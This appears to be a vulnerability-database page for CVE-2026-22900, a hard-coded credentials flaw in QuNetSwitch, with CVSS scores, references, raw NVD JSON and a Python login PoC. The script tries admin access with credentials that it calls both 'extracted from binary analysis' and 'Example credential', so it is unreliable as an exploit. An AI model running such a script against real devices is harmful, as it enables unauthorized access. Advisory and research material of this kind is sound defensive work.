CVE-2026-22900

Description

A use of hard-coded credentials vulnerability has been reported to affect QuNetSwitch. The remote attackers can then exploit the vulnerability to gain unauthorized access. We have already fixed the vulnerability in the following version: QuNetSwitch 2.0.5.0906 and later

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:qnap:qunetswitch:*:*:*:*:*:*:*:* - VULNERABLE

QuNetSwitch < 2.0.5.0906

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# PoC for CVE-2026-22900 (Hard-coded Credentials)
# This script demonstrates authentication using the hardcoded credentials.

import requests
import sys

def exploit(target_ip):
    # Hardcoded credentials extracted from binary analysis
    username = "admin"  # Example credential
    password = "quadmin_secret" # Example credential
    
    target_url = f"http://{target_ip}/api/login"
    
    print(f"[*] Attempting to login to {target_url} using hardcoded credentials...")
    
    payload = {
        "username": username,
        "password": password
    }
    
    try:
        response = requests.post(target_url, data=payload, timeout=10)
        if response.status_code == 200 and "success" in response.text.lower():
            print("[+] Exploit successful! Logged in as Administrator.")
            print(f"[+] Response: {response.text}")
        else:
            print("[-] Exploit failed or patch applied.")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: python3 {sys.argv[0]} <target_ip>")
        sys.exit(1)
    exploit(sys.argv[1])

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22900
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22900
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22900/
[4] VulDB https://vuldb.com/cve/CVE-2026-22900
[5] https://www.qnap.com/en/security-advisory/qsa-26-11

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22900", "sourceIdentifier": "[email protected]", "published": "2026-03-20T17:16:44.467", "lastModified": "2026-03-25T21:07:01.093", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A use of hard-coded credentials vulnerability has been reported to affect QuNetSwitch. The remote attackers can then exploit the vulnerability to gain unauthorized access.\n\nWe have already fixed the vulnerability in the following version:\nQuNetSwitch 2.0.5.0906 and later"}, {"lang": "es", "value": "Se ha reportado una vulnerabilidad de uso de credenciales codificadas de forma rígida que afecta a QuNetSwitch. Los atacantes remotos pueden entonces explotar la vulnerabilidad para obtener acceso no autorizado.\n\nYa hemos corregido la vulnerabilidad en la siguiente versión:\nQuNetSwitch 2.0.5.0906 y posteriores"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-798"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:qnap:qunetswitch:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.1.13077", "versionEndExcluding": "2.0.5.0906", "matchCriteriaId": "B43C9E36-951F-4020-B6E3-C7D4941ABC50"}]}]}], "references": [{"url": "https://www.qnap.com/en/security-advisory/qsa-26-11", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}